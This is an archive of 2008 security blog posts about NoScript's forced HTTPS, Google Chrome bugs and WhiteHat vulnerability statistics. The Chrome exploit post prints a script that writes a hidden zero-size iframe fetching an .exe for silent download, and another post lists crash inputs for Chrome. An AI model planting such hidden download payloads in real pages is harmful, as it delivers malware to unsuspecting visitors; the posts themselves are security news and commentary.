Friday, September 19, 2008

Noscript vs SurfJacking

| Armando Romeo |
Giorgio has added a new special feature to popular Noscript.

With new version 1.8.13 is now possible to force HTTPS on a (wildcard) list of websites and many other features regarding safety of the Https.
This comes in useful at protecting from SurfJacking attack put in practice by Sandro Gauci's tool.


Although Gmail solved the Surf jacking issue, that could lead to cookie stealing through a sophisticated hijacking, too many websites are still vulnerable to this kind of attack.

Now there's no additional work to do except providing a list of websites to Noscript and have it do the protection for us above all when we are in a hostile environment like an internet cafe or a open wifi connection.

Basically Noscript adds the secure flag to cookies on the fly forcing the cookie to be sent only on https connections.

Very good. When will Noscript be embedded in Mozilla off-the-shelf?

Anyway, this was a quick post. Time to fill my encypted cookies website list...

Thursday, September 4, 2008

Google Chrome Silent File Download Exploit

| Armando Romeo |

As I said my previous post was destined to be outated very soon.

This is what appeared few minutes ago on milw0rm and packetstorm:


< script > document.write('< iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0" >'); < / script >

This script should (I haven't tested it yet, will do it later) trigger a silent download on the client machine.

Today Hackers Center stats showed 13% of visitors using the new raw browser.
This is temporary peak, but still scary considering all the bugs found in less than 48 hours.


I think Google will soon regret about this too-soon release

Wednesday, September 3, 2008

Google Chrome vulnerabilities list

| Armando Romeo |

Ok, news is old, Google has released a new browser and all the web is blogging about it. But my duties are to talk about security so I'm not going to review Google Chrome's features but to list the vulnerabilities already found after only 16 hours from the release. (I fear this post will be outdated in few hours)

Rishi Narang has been the first. A Denial Of Service simple as pie:

Just browse this page and place your mouse over this link (make sure you bookmark this page if you want to read on though):

CRASH ME

Just "evil:%" in the anchor text is capable of crashing all the Chrome tabs (despite all the tabs are separated processes).

Someone has also reported that by entering a very long bookmark may kill the browser. Length has not been given but it's worth a try.

If your Chrome is still alive you may want to try entering

about@:

in the location bar.

Good thing is that the browser doesn't need Administrator rights to run.

Matt Cutt from his blog has stated that the chapter 11 of Eula will be updated. Yes the chapter about you giving all the rights to Google:

a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content which you submit, post or display on or through, the Services.

I'm worried about the enthusiastic reviews I see online.
Google brand was enough to push an unfinished product up to make it 1% of the User-Agent's used on its very first day.
The risk is high, fuzzers are still crunching...

Monday, September 1, 2008

WhiteHat website vulnerabilities stats

| Armando Romeo |
WhiteHat security showed some numbers based on the stats collected by real word assessments they carried out on 687 custom-code websites (so no "known" publicly available vulnerabilities stats here)

Jeremiah's webinar was quite interesting and showing such numbers is not a common practice either.
So before any comments, kudos to Jeremiah.


The most interesting of the stats are the type of vulnerabilities found that I wish to add my comments to.


67% of sites suffer from Cross site scripting
Not a big surprise here. I'd have expected even bigger numbers here. Probably .NET framework xss prevention played some role here.
XSS is still on top of top of owasp 10 vulnerabilities a lot of research has been made and a lot of discussion on xss prevention is going on but developers still fail to sanitize and encode input/output.

The only solution I see here is to prevent developers from writing buggy code through the use of robust frameworks since years of tutorials, conferences and best practicea don't seem to have worked.


17% of sites suffer from SQL Injection
SQL injection is easier to prevent. Remediation/development units of an organization tend to prioritize this kind of vulnerability cause its danger is felt more real compared to xss.

The attack to organization's data has more "emotional impact" over the management and executive units than xss.
Xss takes more priority when it is persistent anyway.

SQL Injection prevention is also better understood from a remediation report. With prepared statement or proper input sanitization the vulnerability is away.
Forcing developers to use prepared statement would drop this percentage near to zero.

As Jeremiah said CSRF made its appearance for the first time in the stats.
But honestly speaking, 8% for this vulnerability had something suspicious to me.


Someone asked more information on this before me.

Jeremiah says explicitly that these numbers are based on the effectiveness of automated tools they use.
And adds that real numbers for CSRF are approaching 75%.

This is what I thought at first indeed.

At now all the companies are relying upon automated tools that are not able to cover such kind of vulnerabilities that require a manual testing for their discovery.

This is where the industry is stuck.
Relying upon tools that are not able to catch them all (logic flaws here too) and keeping manual testing at a minimum to keep low fares and win competition.

Not that this is a sin by security services vendors, but the 8% of CSRF is symptom of a commonly accepted failure of such tools.

Accepted by companies that cannot afford a manual reviews (when feasible anyway) and accepted by security services providers who earn money with much less efforts.

My question is: How could have, a tool, discovered a logic flaw like the latest big Joomla exploit?
Probably only a source code audit could have uncovered it (probably). But who is auditing souce code anymore when you have tools?
Smells like the old "false sense of security" here.

Free Security Magazines